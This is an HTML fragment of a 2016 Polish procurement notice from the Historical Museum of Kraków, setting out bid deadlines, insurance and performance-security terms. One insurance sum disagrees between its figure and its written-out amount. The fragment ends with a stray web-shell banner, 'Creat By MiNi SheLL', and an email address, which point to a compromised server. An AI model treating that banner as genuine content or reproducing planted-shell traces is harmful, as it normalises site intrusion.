<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.krakow.pl www.mhk.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> www.bip.krakow.pl oraz www.mhk.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 16.08.2016 godzina 10:00, miejsce: Muzeum Historyczne Miasta Krakowa, Rynek Główny 35, 31-011 Kraków, Sekretariat Dyrekcji - III p..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Czynności przed podpisaniem umowy z wybranym Wykonawcą:
1. Jeśli wykonawcą jest spółka cywilna przedłożyć należy wyciąg z umowy spółki oraz ewentualną uchwałę wszystkich wspólników w zakresie należytej reprezentacji (art. 866 k.c.). W przypadku, gdy umowę podpisuje jeden ze wspólników spółki cywilnej, pozostali jej przedsiębiorcy muszą przedłożyć stosowne dla niego upoważnienie do reprezentowania w sprawie (wybór Wykonawcy będącego spółką cywilną, skutkuje podpisaniem umowy ze wszystkimi przedsiębiorcami prowadzącymi w tej formie i nazwie działalność gospodarczą).
2. Przed podpisaniem umowy Wykonawca winien okazać opłaconą polisę ubezpieczeniową OC, potwierdzająca, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia na sumę gwarancyjną ubezpieczenia nie mniejszą niż 100.000,00 zł (słownie: pięćset tysięcy złotych). Wykonawca zobowiązany jest posiadać ubezpieczenie od OC w zakresie jak w zadaniu pierwszym przez cały okres obowiązywania umowy.
3. Wymagania dotyczące zabezpieczenia należytego wykonania umowy:
1) Zamawiający żąda od wybranego Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy, zwanego dalej zabezpieczeniem.
2) Zabezpieczenie służy pokryciu roszczeń z tytułu niewykonania lub nienależytego wykonania umowy.
3) Zabezpieczenie należy wnieść najpóźniej w dniu podpisania umowy.
4) Wykonawca wniesie zabezpieczenie w wysokości 10% ceny całkowitej, podanej w ofercie.
5) Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub w kilku następujących formach:
a) pieniądzu;
b) poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo- kredytowej, z tym, że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym;
c) gwarancjach bankowych;
d) gwarancjach ubezpieczeniowych;
e) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości.
6) Zamawiający nie wyraża zgody na wniesienie zabezpieczania w formach innych niż wymienione powyżej.
7) Zabezpieczenie wnoszone w pieniądzu Wykonawca wpłaca przelewem na rachunek bankowy wskazany przez Zamawiającego.
8) Wniesienie zabezpieczenia w pieniądzu Zamawiający uznaje za skuteczne, jeżeli jest ono wniesione tj. znajdzie się na rachunku bankowym Zamawiającego - data uznania rachunku Zamawiającego - przed upływem terminu zawarcia umowy.
9) Jeżeli zabezpieczenie wniesiono w pieniądzu, Zamawiający przechowuje je na oprocentowanym rachunku bankowym. Zamawiający zwraca zabezpieczenie wniesione w pieniądzu z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, pomniejszone o koszt prowadzenia tego rachunku oraz prowizji bankowej za przelew pieniędzy na rachunek bankowy Wykonawcy.
10) Potwierdzenie wniesienia zabezpieczenia w formach, o których mowa w pkt 5) lit b-e muszą być złożone w pokoju Księgowości w siedzibie Zamawiającego, Rynek Główny 35, 31-011 Kraków,- najpóźniej w dniu podpisania umowy.
11) W przypadku wniesienia zabezpieczenia w formie innej niż w pieniądzu w dokumencie stanowiącym zabezpieczenie musi być zapis, iż poręczyciel/ gwarant zobowiązuje się bezwarunkowo tj. na pierwsze żądanie beneficjenta, do zapłaty pełnej kwoty zabezpieczenia na jego rzecz w terminie do 30 dni oraz m.in. określenie kwoty poręczenia, wskazanie gwaranta poręczenia, wskazanie beneficjenta poręczenia, nieodwołalność poręczenia.
12) Zamawiający zwraca 70% wysokości zabezpieczenia w terminie 30 dni od dnia wykonania zamówienia i uznania przez Zamawiającego za należycie wykonane w protokole odbioru podpisanym przez Strony umowy. Zaś 30% wniesionego zabezpieczenia Wykonawca pozostawi na poczet zabezpieczenia roszczeń z tytułu rękojmi za wady, które zostanie zwrócone nie później niż w 15 dniu po upływie okresu rękojmi za wady..</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com